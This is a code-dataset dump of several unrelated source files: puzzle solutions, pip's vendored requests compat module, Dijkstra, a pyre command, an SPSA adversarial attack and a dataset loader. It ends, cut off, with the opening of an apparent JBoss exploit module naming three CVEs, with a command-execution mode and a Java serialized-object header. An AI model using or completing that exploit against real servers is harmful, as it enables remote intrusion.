9dec2bb4bd6c683b6ff8000f2bf62e0e6ec8d149 | f3dfd8d7ccd54fe4e94ba59437f76256ef9ef5c6 | /안채현/0805Thu_문자열/PR_숫자문자열과영단어_chae_dictionary1.py | 06bed93579c9330b2497826ffd2f9f21e6f276ac | [] | no_license | honglim99/studygroup | 366ceb0e4228e8417c8f094aba589067d6dbd3f0 | 20a67b13101a48f9d6b84668ba35518e2a2df5f6 | refs/heads/master | 2023-06-30T23:56:52.813849 | 2021-08-08T02:28:05 | 2021-08-08T02:28:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 827 | py | """num_dict = {'zero':0, 'one':1, 'two':2, 'three':3, 'four':4, 'five':5, 'six':6, 'seven':7, 'eight':8, 'nine':9}
def solution(s):
answer = s
for key, value in num_dict.items():
answer = answer.replace(key, value) #TypeError: replace() argument 2 must be str, not int
return int(answer)
"""
# Why it failed: TypeError: replace() argument 2 must be str, not int
"""num_dict = {"zero":"0", "one":"1", "two":"2", "three":"3", "four":"4", "five":"5", "six":"6", "seven":"7", "eight":"8", "nine":"9"}
def solution(s):
answer = s #??
for key, value in num_dict.items():
answer = answer.replace(key, value)
#print(int(answer)) 1478 234567 234567 123
return int(answer)
solution('one4seveneight')
solution('23four5six7')
solution('2three45sixseven')
solution('123')"""
| [
"[email protected]"
] | |
16c933dacc6329ecefdc1061f3773c0e6384b462 | 7d2f933ed3c54e128ecaec3a771817c4260a8458 | /venv/Lib/site-packages/pip/_vendor/requests/compat.py | f567d706cd0d1dc57b89d2eeb78b0a4b4b0bc943 | [] | no_license | danielmoreira12/BAProject | c61dfb1d0521eb5a28eef9531a00e744bfb0e26a | 859f588305d826a35cc8f7d64c432f54a0a2e031 | refs/heads/master | 2021-01-02T07:17:39.267278 | 2020-02-25T22:27:43 | 2020-02-25T22:27:43 | 239,541,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,940 | py | # -*- coding: utf-8 -*-
"""
requests.compat
~~~~~~~~~~~~~~~
This module handles import compatibility issues between Python 2 and
Python 3.
"""
import sys
from pip._vendor import chardet
# -------
# Pythons
# -------
# Syntax sugar.
_ver = sys.version_info
#: Python 2.x?
is_py2 = (_ver[0] == 2)
#: Python 3.x?
is_py3 = (_ver[0] == 3)
# Note: We've patched out simplejson support in pip because it prevents
# upgrading simplejson on Windows.
# try:
# import simplejson as json
# except (ImportError, SyntaxError):
# # simplejson does not support Python 3.2, it throws a SyntaxError
# # because of u'...' Unicode literals.
import json
# ---------
# Specifics
# ---------
if is_py2:
from urllib import (
quote, unquote, quote_plus, unquote_plus, urlencode, getproxies,
proxy_bypass, proxy_bypass_environment, getproxies_environment)
from urlparse import urlparse, urlunparse, urljoin, urlsplit, urldefrag
from urllib2 import parse_http_list
import cookielib
from Cookie import Morsel
from StringIO import StringIO
from collections import Callable, Mapping, MutableMapping, OrderedDict
builtin_str = str
bytes = str
str = unicode
basestring = basestring
numeric_types = (int, long, float)
integer_types = (int, long)
elif is_py3:
from urllib.parse import (
    urlparse, urlunparse, urljoin, urlsplit, urlencode, quote, unquote,
    quote_plus, unquote_plus, urldefrag)
from urllib.request import (
    parse_http_list, getproxies, proxy_bypass, proxy_bypass_environment,
    getproxies_environment)
from http import cookiejar as cookielib
from http.cookies import Morsel
from io import StringIO
from collections import OrderedDict
from collections.abc import Callable, Mapping, MutableMapping
builtin_str = str
str = str
bytes = bytes
basestring = (str, bytes)
numeric_types = (int, float)
integer_types = (int,)
| [
"[email protected]"
] | |
1d42cbd09fcf99997ea91a42c32d8fd54beb97a5 | c874cc40a903295b33893d2750b6caf373386e6f | /grid_equiv_classes.py | 9453a6843898226e986dcf18cf09ab64d3a78da6 | [] | no_license | runbobby/Item-Matching-Game | 6cbf99923b05987dc2aa50dd0ea2560c9e62625e | 21606a9058190c17ad21d9b4b4e04943ae8e84a8 | refs/heads/master | 2021-01-19T11:40:08.544928 | 2017-04-12T00:27:51 | 2017-04-12T00:27:51 | 87,986,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,555 | py | import numpy as np
import os
# equivalent of the original IPython "%cd" magics: work from ~/Documents/item_matching/data
os.chdir(os.path.join(os.path.expanduser('~'), 'Documents', 'item_matching', 'data'))
import json
# warning!!!!!!!!!!!!!!!!!
# this code uses integer division twice
# may need to rewrite code depending on environment
# parameters
# u = # unsolved slots, o = # orange items; o <= u
# y = # yellow
# also y + u <= max_s, in this case, 5
# possible grids. we want to find isomorphism classes of grids
# the integer i corresponds to a grid as follows:
# i = i_{uo-1} i_{uo-2} ... i_1 i_0 in binary
# digit 0 means "known incorrect." digit 1 means "no info"
# example
# slot0, slot1, slot2, slot3
# item1 i_0 i_1 i_2 i_3
# item2 i_4 i_5 i_6 i_7
# item3 i_8 i_9 i_10 i_11
# NEW!!!!!!!!!!!!!!!!!!!!!!!!!!
# now, a grid is parameterized by (u, o, y): u unsolved slots, o orange items, y yellow items
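# worked example (illustration only): with u = 2 slots and o + y = 2 items,
# the integer 6 = 0b0110 has digits i_0=0, i_1=1, i_2=1, i_3=0, i.e.
#   item1: slot0 -> known incorrect, slot1 -> no info
#   item2: slot0 -> no info,         slot1 -> known incorrect
# (in general, digit k belongs to item k // u at slot k % u)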
def sweep_all_settings():
    # enumerate every setting with o <= u and u + y <= 5;
    # deferred into a function so grid_classes exists before it is called
    for u in range(0, 6):
        for o in range(0, u + 1):
            for y in range(0, 6 - u):
                grid_classes(u, o, y)
                print(u, o, y)
def grid_classes(u, o, y):
N = pow(2, u * (o + y))
oy = o + y
nss = [0] * max(0, u-1)
nsi = [0] * max(0, o-1)
nsy = [0] * max(0, y-1)
for a in range(len(nss)):
nss[a] = [-1] * N
for a in range(len(nsi)):
nsi[a] = [-1] * N
for a in range(len(nsy)):
nsy[a] = [-1] * N
# compute transposes as in old, but replace o in old with o+y
transpose = [0]*N
transpose2 = [0]*N
adjustment = [0] * (u * (o + y))
adj = 0
k = 0
for j in range(o + y):
for i in range(u):
adjustment[k] = adj + pow(2, i * (o + y) + j)
adj -= pow(2, i * (o + y) + j)
k += 1
j = 0
for i in range(N):
transpose[i] = j
transpose2[j] = i
# j += 1
# a = number of powers of 2 dividing i+1
a = 0
b = i+1
while b%2 == 0:
a += 1
b //= 2  # integer division keeps b an int under Python 3
if a == u * (o + y): break
# if a = 0, we do j+= 1. otherwise, we need to add something tricky
j += adjustment[a]
# populate nss
p2o = pow(2, o + y)
for a in range(u-1):
# print nss[a]
p2ao = pow(2, a*(o + y))
place_value = pow(2, (1+a)*(o + y))
grid = 0
for i in range(p2o):
# print(a, i)
for j in range(pow(2, (o + y)*(u-1))):
# grid += 1
grid = i + p2o * j
# print (a, i, j, transpose2[grid], nss[a][transpose2[grid]])
if nss[a][transpose2[grid]] != -1: continue
r = (j // p2ao) % p2o
neighbor = grid + (r - i) + (i - r)*place_value
# print a, transpose2[grid], transpose2[neighbor]
nss[a][transpose2[grid]] = transpose2[neighbor]
nss[a][transpose2[neighbor]] = transpose2[grid]
# populate nsi
p2u = pow(2, u)
for a in range(o-1):
# populate nsi[a]
place_value = pow(2, (1+a)*u)
p2au = pow(2, a*u)
grid = 0
for i in range(p2u):
for j in range(pow(2, u*(o + y - 1))):
# grid += 1
grid = i + p2u * j
if nsi[a][grid] != -1: continue
# r = row to be switched; it's ablock of j in binary
r = (j // p2au) % p2u
# neighbor is formed by switching two digits in base p2u
# namely the ones digit and the (p2u)^(a+1)'s place
neighbor = grid + (r - i) + (i - r)*place_value
nsi[a][grid] = neighbor
nsi[a][neighbor] = grid
# populate nsy
C = pow(2, u * (1 + o))
p2ou = pow(2, u * o)
for a in range(y - 1):
place_value = pow(2, (1 + o + a)*u)
D = pow(2, u * (a + o))
p2au = pow(2, a * u)
grid = 0
for i in range(C):
ii = i // p2ou
for j in range(pow(2, u * (y - 1))):
grid = i + C * j
if nsy[a][grid] != -1: continue
r = (j // p2au) % p2u
neighbor = grid + (r - ii) * p2ou + (ii - r) * place_value
nsy[a][grid] = neighbor
nsy[a][neighbor] = grid
# dfs traversal
visited = [False] * N
vv = 0
Class = [-1] * N
while vv < N:
while vv < N and visited[vv]:
vv += 1
if vv == N: break
vertex = vv
visited[vertex] = True
# vertex is the lowest representative in its isomorphism class
Class[vertex] = vertex
v_not_visited = [True] * N
v_not_visited[vertex] = False
in_v_component = [vertex]
ivc_index = 0
while ivc_index < len(in_v_component):
x = in_v_component[ivc_index]
for a in range(o-1):
w = nsi[a][x]
if v_not_visited[w]:
in_v_component.append(w)
v_not_visited[w] = False
visited[w] = True
Class[w] = vertex
for a in range(u-1):
w = nss[a][x]
if v_not_visited[w]:
in_v_component.append(w)
v_not_visited[w] = False
visited[w] = True
Class[w] = vertex
for a in range(y-1):
w = nsy[a][x]
if v_not_visited[w]:
in_v_component.append(w)
v_not_visited[w] = False
visited[w] = True
Class[w] = vertex
ivc_index += 1
reprs = []
for i in range(N):
if Class[i] == i:
reprs.append(i)
###############################################################################
# next: for each representative, determine if there exist valid assignments or not
# a grid is valid iff there is a valid injective map from items -> slots; digits are 1
# method: hall's lemma?
# return 0 if invalid
# return 1 if valid, but needs gray items
# return 2 if valid without gray items
def is_valid(grid):
# g_bin = grid in binary as an array
# g_bin[item][slot]
# gg = only the u x o grid, or the orange items
gg = grid % pow(2, o * u)
g_bin = [0]*o
for a in range(o):
g_bin[a] = [0]*u
for item in range(o):
for slot in range(u):
g_bin[item][slot] = gg % 2
gg = gg // 2
violating_subset = False
for i in range(pow(2, o)):
# a = num ones in i in binary
# i_bin = i in binary; i[d] = 2^d place
i_bin = [0]*o
b_index = 0
a = 0
ii = i
while ii > 0:
if ii % 2 == 1:
a += 1
i_bin[b_index] = 1
ii = ii // 2
b_index += 1
# count of # slots available for the subset i
# recall that by Hall's theorem, this should be >= a
c = 0
for slot in range(u):
for item in range(o):
if i_bin[item] == 1 and g_bin[item][slot] == 1:
c+= 1
break
if c < a:
violating_subset = True
break
if violating_subset:
return 0
# now we need to deal with yellow items. by now, we assume that the orange grid is
# valid wrt. Hall's lemma
# lemma: an orange/yellow grid is exactly 1-valid if there exists a column (out of u)
# such that all orange/yellow items are forbidden from it
# if there exists no such column, then the orange/yellow grid is 2-valid
gg = grid
rows = []
for i in range(o + y):
rows.append(gg % pow(2, u))
gg = gg // pow(2, u)
empty_columns = [True] * u
for i in range(u):
for j in range(o + y):
if rows[j] % 2 == 1:
empty_columns[i] = False
rows[j] = rows[j] // 2
if sum(empty_columns) > 0:
return 1
else:
return 2
valid_reprs = []
number_1_valid = 0
for r in reprs:
if is_valid(r)== 1:
valid_reprs.append(r)
number_1_valid += 1
for r in reprs:
if is_valid(r) == 2:
valid_reprs.append(r)
valid_reprs.append(number_1_valid)
# now, the last term of valid_reprs is the number of one-valid reprs.
dict_vr_to_i = {}
for i in range(len(reprs)):
dict_vr_to_i[reprs[i]] = -1
for i in range(len(valid_reprs) - 1): # don't incluce the last term
dict_vr_to_i[valid_reprs[i]] = i
# rewrite Class so that it points to the representative's index, not the representative
# (smaller numbers)
for i in range(len(Class)):
Class[i] = dict_vr_to_i[Class[i]]
f = open('class'+str(u)+str(o)+str(y)+'.txt', 'w')
json.dump(Class, f)
f.close()
f = open('vr'+str(u)+str(o)+str(y)+'.txt', 'w')
json.dump(valid_reprs, f)
f.close()
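# run the full (u, o, y) sweep now that grid_classes is defined
sweep_all_settings()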
# compute isomorphism classes of grids with u unsolved slots and o orange items
# compute which classes are valid
# store one representative of each valid class in
# Documents\item_matching\vr+str(u)+str(o)+.txt
# store map from all grids -> valid representative (or -1 if invalid)
# in Documents\item_matching\class+str(u)+str(o)+.txt
# estimated time. grid_classes(5, 5): 30 min?
# others are < 2 min
def grid_classes_old(u, o):
N = pow(2, u*o)
# need to make array objects different, so nss = [[0]*N]*(u-1) doesn't work
nss = [0]*(u-1)
nsi = [0]*(o-1)
for a in range(u-1):
nss[a] = [-1]*N
for a in range(o-1):
nsi[a] = [-1] * N
transpose = [0]*N
transpose2 = [0]*N
adjustment = [0] * (u * o)
adj = 0
k = 0
for j in range(o):
for i in range(u):
adjustment[k] = adj + pow(2, i * o + j)
adj -= pow(2, i * o + j)
k += 1
j = 0
for i in range(N):
transpose[i] = j
transpose2[j] = i
# j += 1
# a = number of powers of 2 dividing i+1
a = 0
b = i+1
while b%2 == 0:
a += 1
b //= 2  # integer division keeps b an int under Python 3
if a == u*o: break
# if a = 0, we do j+= 1. otherwise, we need to add something tricky
j += adjustment[a]
# populate nsi
p2u = pow(2, u)
for a in range(o-1):
# populate nsi[a]
place_value = pow(2, (1+a)*u)
p2au = pow(2, a*u)
grid = 0
for i in range(p2u):
for j in range(pow(2, u*(o-1))):
# grid += 1
grid = i + p2u * j
if nsi[a][grid] != -1: continue
# r = row to be switched; it's ablock of j in binary
r = (j // p2au) % p2u
# neighbor is formed by switching two digits in base p2u
# namely the ones digit and the (p2u)^(a+1)'s place
neighbor = grid + (r - i) + (i - r)*place_value
nsi[a][grid] = neighbor
nsi[a][neighbor] = grid
# populate nss
p2o = pow(2, o)
for a in range(u-1):
# print nss[a]
p2ao = pow(2, a*o)
place_value = pow(2, (1+a)*o)
grid = 0
for i in range(p2o):
# print(a, i)
for j in range(pow(2, o*(u-1))):
# grid += 1
grid = i + p2o * j
# print (a, i, j, transpose2[grid], nss[a][transpose2[grid]])
if nss[a][transpose2[grid]] != -1: continue
r = (j // p2ao) % p2o
neighbor = grid + (r - i) + (i - r)*place_value
# print a, transpose2[grid], transpose2[neighbor]
nss[a][transpose2[grid]] = transpose2[neighbor]
nss[a][transpose2[neighbor]] = transpose2[grid]
# dfs traversal
visited = [False] * N
vv = 0
Class = [-1] * N
while vv < N:
while vv < N and visited[vv]:
vv += 1
if vv == N: break
vertex = vv
visited[vertex] = True
# vertex is the lowest representative in its isomorphism class
Class[vertex] = vertex
v_not_visited = [True] * N
v_not_visited[vertex] = False
in_v_component = [vertex]
ivc_index = 0
while ivc_index < len(in_v_component):
x = in_v_component[ivc_index]
for a in range(o-1):
w = nsi[a][x]
if v_not_visited[w]:
in_v_component.append(w)
v_not_visited[w] = False
visited[w] = True
Class[w] = vertex
for a in range(u-1):
w = nss[a][x]
if v_not_visited[w]:
in_v_component.append(w)
v_not_visited[w] = False
visited[w] = True
Class[w] = vertex
ivc_index += 1
# determine unique representatives
# uses fact that representatives are exactly the i for which Class[i] == i
reprs = []
for i in range(N):
if Class[i] == i:
reprs.append(i)
###############################################################################
# next: for each representative, determine if there exist valid assignments or not
# a grid is valid iff there is a valid injective map from items -> slots; digits are 1
# method: hall's lemma?
def is_valid(grid):
# g_bin = grid in binary as an array
# g_bin[item][slot]
gg = grid
g_bin = [0]*o
for a in range(o):
g_bin[a] = [0]*u
for item in range(o):
for slot in range(u):
g_bin[item][slot] = gg % 2
gg = gg // 2
violating_subset = False
for i in range(pow(2, o)):
# a = num ones in i in binary
# i_bin = i in binary; i[d] = 2^d place
i_bin = [0]*o
b_index = 0
a = 0
ii = i
while ii > 0:
if ii % 2 == 1:
a += 1
i_bin[b_index] = 1
ii = ii // 2
b_index += 1
# count of # slots available for the subset i
# recall that by Hall's theorem, this should be >= a
c = 0
for slot in range(u):
for item in range(o):
if i_bin[item] == 1 and g_bin[item][slot] == 1:
c+= 1
break
if c < a:
violating_subset = True
break
return not(violating_subset)
valid_reprs = []
for r in reprs:
if is_valid(r):
valid_reprs.append(r)
dict_vr_to_i = {}
for i in range(len(reprs)):
dict_vr_to_i[reprs[i]] = -1
for i in range(len(valid_reprs)):
dict_vr_to_i[valid_reprs[i]] = i
# rewrite Class so that it points to the representative's index, not the representative
# (smaller numbers)
for i in range(len(Class)):
Class[i] = dict_vr_to_i[Class[i]]
f = open('class'+str(u)+str(o)+'.txt', 'w')
json.dump(Class, f)
#for i in range(len(Class)):
# f.write(str(Class[i]) + " ")
f.close()
f = open('vr'+str(u)+str(o)+'.txt', 'w')
json.dump(valid_reprs, f)
#for i in range(len(valid_reprs)):
# f.write(str(valid_reprs[i]) + " ")
f.close()
| [
"[email protected]"
] | |
a0f2a687b6f6f2ad88f7d90e2dd1424c4a8010f5 | 6df7c81b013305b11aa3f678b4ccb64506a31e59 | /attacker/attacks/spsa.py | 008bb4e864fbd3e3d4bbb445aeb4637418c4791b | [] | no_license | KaihuaTang/CiiV-Adversarial-Robustness.pytorch | a79ae9ec20fe66ccfd6557f1ed0f073a4d6b4076 | 4a18df048240e841ca77c1701fecbf5a4ee49fb3 | refs/heads/main | 2023-07-30T23:18:37.994775 | 2021-10-06T05:54:33 | 2021-10-06T05:54:33 | 377,840,412 | 13 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,331 | py | ##############################################################################
# Modified from https://github.com/BorealisAI/advertorch/
##############################################################################
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from ..attacker import Attacker
import utils.general_utils as utils
class SPSA(Attacker):
r"""
SPSA in the paper 'Adversarial Risk and the Dangers of Evaluating Against Weak Attacks'
[https://arxiv.org/abs/1802.05666]
"""
def __init__(self, model, logger, config, delta=0.1, eps=16, batch_size=128, steps=5, lr=0.01):
super(SPSA, self).__init__("SPSA", model, logger, config)
self.batch_size = batch_size
self.delta = delta
self.eps = eps / 255.0
self.steps = steps
self.lr = lr
logger.info('Create Attacker SPSA with delta: {}, eps: {}, steps: {}, lr: {}, batch_size: {}'.format(delta, eps, steps, lr, batch_size))
def forward(self, images, labels, random_start=False, targeted=False):
images, labels = images.cuda(), labels.cuda()
dx = torch.zeros_like(images)
dx.grad = torch.zeros_like(dx)
optimizer = optim.Adam([dx], lr=self.lr)
for _ in range(self.steps):
optimizer.zero_grad()
# Adam minimizes its objective, so negate the estimated gradient in order
# to ascend the cross-entropy loss (i.e., move toward misclassification)
dx.grad = -self.spsa_grad(images + dx, labels)
optimizer.step()
adv_images = torch.clamp(images + dx , min=0, max=1)
dx = torch.clamp(adv_images - images, min=-self.eps, max=self.eps)
adv_images = images + dx
return adv_images
def f(self, x, y):
pred = self.model(x)
if isinstance(pred, tuple):
pred = pred[0]
return F.cross_entropy(pred, y)
def spsa_grad(self, x, y):
b, c, w, h = x.shape
x = x.unsqueeze(0)
y = y.unsqueeze(0)
x = x.repeat(self.batch_size, 1, 1, 1, 1).contiguous().view(self.batch_size*b,c,w,h)
y = y.repeat(self.batch_size, 1).contiguous().view(-1)
v = torch.zeros_like(x).bernoulli_().mul_(2.0).sub_(1.0)
df = self.f(x + self.delta * v, y) - self.f(x - self.delta * v, y)
grad = df / (2. * self.delta * v)
grad = grad.view(self.batch_size,b,c,w,h).mean(dim=0)
return grad | [
"[email protected]"
] | |
a9721dd19e6e401f81976ca0aab05f6e3589dc70 | a2b20597759990445081057d35d113434cfcf970 | /client/commands/report_any_expressions.py | 5d59244a817f4ddf25911ab884d7403f398a83ef | [
"MIT"
] | permissive | facebook/pyre-check | 34059599c02b65605c574f13555229f3b931fd4e | fe8ccedc572cc1faa1fd01e9138f65e982875002 | refs/heads/main | 2023-09-03T19:10:11.587028 | 2023-09-02T07:40:35 | 2023-09-02T07:40:35 | 110,274,488 | 6,703 | 575 | MIT | 2023-09-13T17:02:32 | 2017-11-10T17:31:36 | OCaml | UTF-8 | Python | false | false | 6,206 | py | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
This module provides the entrypoint for `pyre report-any-expressions`, a command
to collect data about how often the Pyre type check for an expression will have
a safety gap.
There are two main causes of safety gaps:
- `Any` appearing in the inferred type for the expression itself, e.g.
due to a missing return type on some function we called.
- The expression being passed to a function whose parameters lack annotations.
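For example (hypothetical snippet, for illustration only):

    def f(x):          # un-annotated parameter, so `x` is implicitly `Any`
        return x.attr  # this attribute access goes unchecked
    y = f(42)          # the inferred type of `f(42)` is `Any` -> safety gap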
"""
from __future__ import annotations
import dataclasses
import json
import logging
import tempfile
from pathlib import Path
from typing import List, Optional, Sequence, Union
from .. import (
coverage_data,
daemon_socket,
dataclasses_json_extensions as json_mixins,
frontend_configuration,
identifiers,
log,
)
from . import commands, daemon_query, expression_level_coverage, query_response
LOG: logging.Logger = logging.getLogger(__name__)
def relative_path(
backend_absolute_path: str,
root_path: Path,
) -> str:
return str(Path(backend_absolute_path).relative_to(root_path))
@dataclasses.dataclass(frozen=True)
class AnyExpression(json_mixins.SnakeCaseAndExcludeJsonMixin):
expression_type: str
reasons: List[str]
root_cause_function_name: Optional[str]
location: coverage_data.Location
@staticmethod
def from_typed_backend_data(
data: expression_level_coverage.CoverageGap,
) -> AnyExpression:
return AnyExpression(
expression_type=data.type_,
reasons=data.reason,
root_cause_function_name=data.function_name,
location=coverage_data.Location(
start_line=data.location.start.line,
start_column=data.location.start.column,
end_line=data.location.stop.line,
end_column=data.location.stop.column,
),
)
@dataclasses.dataclass(frozen=True)
class ExpressionStatistics(json_mixins.SnakeCaseAndExcludeJsonMixin):
any_expression_count: int
total_expression_count: int
# Records cases where the backend couldn't process the module.
error: Optional[str] = None
@staticmethod
def from_error(
error: str,
) -> ExpressionStatistics:
return ExpressionStatistics(
any_expression_count=0,
total_expression_count=0,
error=error,
)
@staticmethod
def from_coverage_at_path(
coverage_at_path: expression_level_coverage.CoverageAtPath,
) -> ExpressionStatistics:
return ExpressionStatistics(
any_expression_count=len(coverage_at_path.coverage_gaps),
total_expression_count=coverage_at_path.total_expressions,
)
@dataclasses.dataclass(frozen=True)
class ModuleExpressionData(json_mixins.SnakeCaseAndExcludeJsonMixin):
path: str
expression_statistics: ExpressionStatistics
any_expressions: List[AnyExpression]
@staticmethod
def from_typed_backend_data(
data: Union[
expression_level_coverage.CoverageAtPathResponse,
expression_level_coverage.ErrorAtPathResponse,
],
root_path: Path,
) -> ModuleExpressionData:
if isinstance(data, expression_level_coverage.CoverageAtPathResponse):
coverage_at_path = data.CoverageAtPath
return ModuleExpressionData(
path=relative_path(coverage_at_path.path, root_path),
any_expressions=[
AnyExpression.from_typed_backend_data(coverage_gap)
for coverage_gap in coverage_at_path.coverage_gaps
],
expression_statistics=ExpressionStatistics.from_coverage_at_path(
coverage_at_path
),
)
else:
error_at_path = data.ErrorAtPath
return ModuleExpressionData(
path=relative_path(error_at_path.path, root_path),
any_expressions=[],
expression_statistics=ExpressionStatistics.from_error(
error_at_path.error
),
)
def get_module_paths(
configuration: frontend_configuration.Base,
paths: Optional[List[Path]],
) -> List[Path]:
if paths is None:
paths = [
configuration.get_local_root() or configuration.get_global_root(),
]
return list(
coverage_data.find_module_paths(
paths=paths,
excludes=configuration.get_excludes(),
)
)
def print_data_as_json(data: Sequence[ModuleExpressionData]) -> None:
raw_data = [module_data.to_dict() for module_data in data]
json.dump(raw_data, log.stdout)
def query_backend(
configuration: frontend_configuration.Base,
paths: Optional[List[Path]],
) -> query_response.Response:
socket_path = daemon_socket.get_socket_path(
configuration.get_project_identifier(),
flavor=identifiers.PyreFlavor.CLASSIC,
)
module_paths = get_module_paths(
configuration=configuration,
paths=paths,
)
with tempfile.NamedTemporaryFile("w") as paths_file:
paths_file.write("\n".join(str(path) for path in module_paths))
paths_file.flush()
query_string = f'expression_level_coverage("@{paths_file.name}")'
return daemon_query.execute_query(socket_path, query_string)
def run(
configuration: frontend_configuration.Base,
paths: Optional[List[Path]],
) -> int:
raw_response = query_backend(
configuration=configuration,
paths=paths,
)
typed_response = expression_level_coverage._make_expression_level_coverage_response(
raw_response.payload
)
project_root = configuration.get_local_root() or configuration.get_global_root()
report = [
ModuleExpressionData.from_typed_backend_data(
path_response,
project_root,
)
for path_response in typed_response.response
]
print_data_as_json(report)
return commands.ExitCode.SUCCESS
| [
"[email protected]"
] | |
2097ee39581794e41f8318e3dc39f25ae2c0e9b5 | 2d6481f60585fed286aeddf704b9052a33c63fb3 | /Graph Implementations and Traversals/ShortestPath.py | 86d3f2cb943bef8ebbd7e2699bbd1bb1ea33b50f | [] | no_license | BALAJISB97/DS | f8cc229f05a7c9d763f2aa888a955da6c7b3936e | e38b2957893016077bf80a3b89d0ce6b3b094fe8 | refs/heads/master | 2022-12-31T09:13:05.540389 | 2020-10-16T07:13:04 | 2020-10-16T07:13:04 | 292,648,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,091 | py | import sys
# Function to find out which of the unvisited nodes
# needs to be visited next
def to_be_visited():
global visited_and_distance
v = -10
# Choosing the vertex with the minimum distance
for index in range(number_of_vertices):
if visited_and_distance[index][0] == 0 \
and (v < 0 or visited_and_distance[index][1] <= \
visited_and_distance[v][1]):
v = index
return v
# Creating the graph as an adjacency matrix
vertices = [[0, 1, 1, 0],
[0, 0, 1, 0],
[0, 0, 0, 1],
[0, 0, 0, 0]]
edges = [[0, 3, 4, 0],
[0, 0, 0.5, 0],
[0, 0, 0, 1],
[0, 0, 0, 0]]
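# vertices[i][j] == 1 marks a directed edge i -> j; its weight is edges[i][j]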
number_of_vertices = len(vertices[0])
# The first element of the lists inside visited_and_distance
# denotes if the vertex has been visited.
# The second element of the lists inside the visited_and_distance
# denotes the distance from the source.
visited_and_distance = [[0, 0]]
for i in range(number_of_vertices-1):
visited_and_distance.append([0, sys.maxsize])
for vertex in range(number_of_vertices):
# Finding the next vertex to be visited.
to_visit = to_be_visited()
for neighbor_index in range(number_of_vertices):
# Calculating the new distance for all unvisited neighbours
# of the chosen vertex.
if vertices[to_visit][neighbor_index] == 1 and \
visited_and_distance[neighbor_index][0] == 0:
new_distance = visited_and_distance[to_visit][1] \
+ edges[to_visit][neighbor_index]
# Updating the distance of the neighbor if its current distance
# is greater than the distance that has just been calculated
if visited_and_distance[neighbor_index][1] > new_distance:
visited_and_distance[neighbor_index][1] = new_distance
# Visiting the vertex found earlier
visited_and_distance[to_visit][0] = 1
i = 0
# Printing out the shortest distance from the source to each vertex
for distance in visited_and_distance:
print("The shortest distance of ",chr(ord('a') + i),\
" from the source vertex a is:",distance[1])
i = i + 1
print(visited_and_distance)
| [
"[email protected]"
] | |
57cb4fe33919d21f7c278b6720c3360ce5e07c75 | 034be882d639a0b2031dca96bbba4b7cec5195f1 | /maskrcnn_benchmark/data/datasets/sidewalk.py | 84d5b36dd0a54e6488d716ce9aafbf6b55c4db0c | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | droseger/maskrcnn-benchmark | 3be529cd75ed571441866408839c0e7b38b653cd | 443568587671e07fa0b55b7e6d17e8e23561c75f | refs/heads/master | 2020-05-04T17:43:02.866844 | 2019-10-07T15:25:08 | 2019-10-07T15:35:50 | 179,323,384 | 0 | 0 | null | 2019-04-03T15:56:36 | 2019-04-03T15:56:36 | null | UTF-8 | Python | false | false | 1,717 | py | import torch
from torchvision.datasets import CocoDetection
from maskrcnn_benchmark.structures.bounding_box import BoxList
from maskrcnn_benchmark.structures.segmentation_mask import SegmentationMask
class Sidewalk(CocoDetection):
def __init__(self, ann_file, root, transforms=None):
super(Sidewalk, self).__init__(root, ann_file)
self.json_category_id_to_contiguous_id = {
v: i + 1 for i, v in enumerate(self.coco.getCatIds())
}
self.contiguous_category_id_to_json_id = {
v: k for k, v in self.json_category_id_to_contiguous_id.items()
}
self.id_to_img_map = {k: v for k, v in enumerate(self.ids)}
self.transforms = transforms
def __getitem__(self, index):
img, anno = super(Sidewalk, self).__getitem__(index)
boxes = [obj["bbox"] for obj in anno]
boxes = torch.as_tensor(boxes).reshape(-1, 4) # guard against no boxes
target = BoxList(boxes, img.size, mode="xywh").convert("xyxy")
classes = [obj["category_id"] for obj in anno]
classes = [self.json_category_id_to_contiguous_id[c] for c in classes]
classes = torch.tensor(classes)
target.add_field("labels", classes)
masks = [obj["segmentation"] for obj in anno]
masks = SegmentationMask(masks, img.size)
target.add_field("masks", masks)
target = target.clip_to_image(remove_empty=True)
if self.transforms is not None:
img, target = self.transforms(img, target)
return img, target, index
def get_img_info(self, index):
img_id = self.id_to_img_map[index]
img_data = self.coco.imgs[img_id]
return img_data
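# Usage sketch (hypothetical paths, for illustration only):
#   dataset = Sidewalk("annotations.json", "images/", transforms=None)
#   img, target, idx = dataset[0]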
| [
"[email protected]"
] | |
4eb72862e3cb96142bcd9b864909095541319d17 | 456fe56ad14e576228654d587ee63dfe1903c87d | /EXP/RedHatJBoss.py | a1807d97591b19f6810fa90713245d985834657a | [] | no_license | kk98kk0/CodeTest | 4270612e2501fc22d35bb0764736b2c8ac2fd87b | e870925ac1405a858efd658b20b071e6b8e388d4 | refs/heads/master | 2023-02-25T12:51:03.784923 | 2021-01-25T07:54:11 | 2021-01-25T07:54:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,055 | py | import random,string,requests,http.client,time
from requests_toolbelt.utils import dump
import urllib.parse
from ClassCongregation import _urlparse
from urllib.parse import urlencode
from urllib.parse import urlparse, quote
from lxml import html
import CodeTest
################
##--RedHatJBoss--##
#cve_2010_0738
#cve_2010_1428
#cve_2015_7501
################
#CMD = echo VuLnEcHoPoCSuCCeSS
#CodeTest.VULN = None => vulnerability check only
#CodeTest.VULN = True => command execution
#Set this module-level flag before running
CodeTest.VULN = None
TIMEOUT = 10
class RedHatJBoss():
def __init__(self, url, CMD):
self.url = url
self.CMD = CMD
self.name = ''.join(random.choices(string.ascii_letters+string.digits, k=8))
self.getipport = urlparse(self.url)
self.hostname = self.getipport.hostname
self.port = self.getipport.port
if self.port == None and r"https://" in self.url:
self.port = 443
elif self.port == None and r"http://" in self.url:
self.port = 80
if r"https" in self.url:
self.conn = http.client.HTTPSConnection(self.hostname, self.port)
else:
self.conn = http.client.HTTPConnection(self.hostname, self.port)
self.headers = {
"Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
